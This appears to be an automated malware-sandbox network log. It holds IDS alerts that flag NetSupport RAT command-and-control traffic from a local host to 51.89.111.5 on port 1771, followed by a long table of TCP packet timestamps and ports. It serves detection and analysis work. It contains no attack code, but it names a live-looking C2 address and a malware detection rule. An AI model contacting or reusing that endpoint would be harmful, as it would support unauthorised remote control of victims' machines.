2024-11-01T18:14:45.925430+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.025465+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.125490+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.326521+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.686446+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.786424+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.886471+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:46.988359+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.088463+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.189429+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:47.290442+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 18:11:05.717082977 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:05.721981049 CET	1771	49700	51.89.111.5	192.168.2.7
Nov 1, 2024 18:11:05.722060919 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:05.881328106 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:05.886202097 CET	1771	49700	51.89.111.5	192.168.2.7
Nov 1, 2024 18:11:06.190162897 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:11:06.195004940 CET	80	49701	104.26.0.231	192.168.2.7
Nov 1, 2024 18:11:06.197381973 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:11:06.227611065 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:11:06.233607054 CET	80	49701	104.26.0.231	192.168.2.7
Nov 1, 2024 18:11:07.200016022 CET	80	49701	104.26.0.231	192.168.2.7
Nov 1, 2024 18:11:07.200228930 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:11:10.929682016 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:10.935190916 CET	1771	49700	51.89.111.5	192.168.2.7
Nov 1, 2024 18:11:14.212973118 CET	1771	49700	51.89.111.5	192.168.2.7
Nov 1, 2024 18:11:14.216054916 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:14.218581915 CET	49700	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:11:14.223560095 CET	1771	49700	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:02.007112980 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:02.012172937 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:02.012242079 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:02.060532093 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:02.065731049 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.062630892 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.067651033 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.565834999 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.666639090 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.699043036 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.699110031 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.767875910 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.774317980 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.867640018 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.872637033 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:07.968070030 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:07.976089954 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.068758965 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.073817968 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.169632912 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.174694061 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.270929098 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.275933981 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.370930910 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.375875950 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.471610069 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.476511002 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.572648048 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.577756882 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.673635006 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.678651094 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.774612904 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.779567957 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.874877930 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.879867077 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:08.974634886 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:08.979641914 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.075634956 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.080760956 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.176646948 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.181842089 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.281071901 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.286113977 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.381700039 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.386697054 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.482635975 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.487761021 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.583616972 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.588656902 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.684639931 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.784630060 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.852607965 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.852659941 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.884648085 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.889689922 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:09.984805107 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:09.990004063 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.085639954 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.090663910 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.185729980 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.190752983 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.286663055 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.291687012 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.387661934 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.393035889 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.488636971 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.493741989 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.503096104 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:10.503174067 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.503245115 CET	49965	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:10.508128881 CET	1771	49965	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:41.823506117 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:41.828475952 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:41.828550100 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:41.879384995 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:41.884617090 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:46.884069920 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:46.889120102 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:46.984056950 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:46.989054918 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.084059000 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.089320898 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.181869984 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.187108994 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.284069061 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.289197922 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.382838964 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.387788057 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.484065056 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.489078999 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.583843946 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.590627909 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.683820009 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.688746929 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.784827948 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.789918900 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.884865046 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.889789104 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:47.986231089 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:47.991180897 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.086827040 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.091937065 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.186856985 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.192230940 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.287545919 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.292565107 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.438872099 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.443964958 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.644079924 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.649403095 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.748061895 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.753015995 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.848054886 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.853423119 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:48.946839094 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:48.951849937 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.048062086 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.053172112 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.147854090 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.152888060 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.247879028 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.253083944 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.348826885 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.366264105 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.452076912 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.457067013 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.552057981 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.557121038 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.649971008 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.655162096 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.750838995 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.757395983 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.850878954 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.855830908 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:49.950875998 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:49.956103086 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:50.051860094 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:50.056886911 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:50.152877092 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:50.157987118 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:50.252845049 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:50.257767916 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:50.312216043 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:50.312288046 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:50.312463045 CET	49974	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:12:50.317625999 CET	1771	49974	51.89.111.5	192.168.2.7
Nov 1, 2024 18:12:56.068763971 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:12:56.074506044 CET	80	49701	104.26.0.231	192.168.2.7
Nov 1, 2024 18:12:56.074557066 CET	49701	80	192.168.2.7	104.26.0.231
Nov 1, 2024 18:13:21.158889055 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:21.163780928 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:21.166445017 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:21.215693951 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:21.220573902 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.220182896 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.226490974 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.320008993 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.327214003 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.420967102 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.520984888 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.622081995 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.674539089 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.674591064 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.674628973 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.722290993 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.727358103 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.822994947 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.827857971 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:26.923018932 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:26.927869081 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.026395082 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.031389952 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.126444101 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.136734009 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.228177071 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.234728098 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.325031042 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.329901934 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.427469015 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.432343006 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.526014090 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.531217098 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.627710104 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.632651091 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.727121115 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.733654022 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.827019930 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.832349062 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:27.928112984 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:27.933700085 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.028117895 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.033724070 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.128062963 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.134908915 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.229211092 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.234383106 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.329231024 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.334306955 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.430008888 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.434957981 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.531013012 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.536120892 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.631998062 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.732011080 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.833204031 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.922738075 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.922758102 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.922766924 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:28.936157942 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:28.941009998 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.033039093 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.038059950 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.136151075 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.142672062 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.235748053 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.240746975 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.336149931 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.341118097 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.436162949 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.441287994 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.537657976 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.542747974 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.637007952 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.642133951 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.649815083 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:13:29.652239084 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.652802944 CET	49975	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:13:29.657624006 CET	1771	49975	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:00.342557907 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:00.347631931 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:00.347722054 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:00.453550100 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:00.458554983 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.454813004 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.459875107 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.559578896 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.564623117 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.660267115 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.666965008 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.764250994 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.769539118 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.861252069 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.869860888 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:05.961321115 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:05.968250036 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.062231064 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.067178965 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.163278103 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.168318987 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.264303923 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.270838022 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.364286900 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.369244099 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.465250969 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.470784903 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.566241980 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.571826935 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.667351007 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.672255039 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.767239094 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.773312092 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.868263006 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.873158932 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:06.968457937 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:06.973833084 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.068252087 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.075196981 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.169224977 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.175009012 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.270236015 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.275295019 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.370239973 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.378386974 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.470238924 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.475512028 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.570282936 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.575237989 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.674268007 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.679205894 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.771244049 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.776328087 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.871288061 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.876286983 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:07.971332073 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:07.976289988 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.071358919 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.078013897 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.172241926 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.182218075 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.272273064 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.281620979 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.373271942 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.380090952 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.473337889 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.478431940 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.574238062 CET	49976	1771	192.168.2.7	51.89.111.5
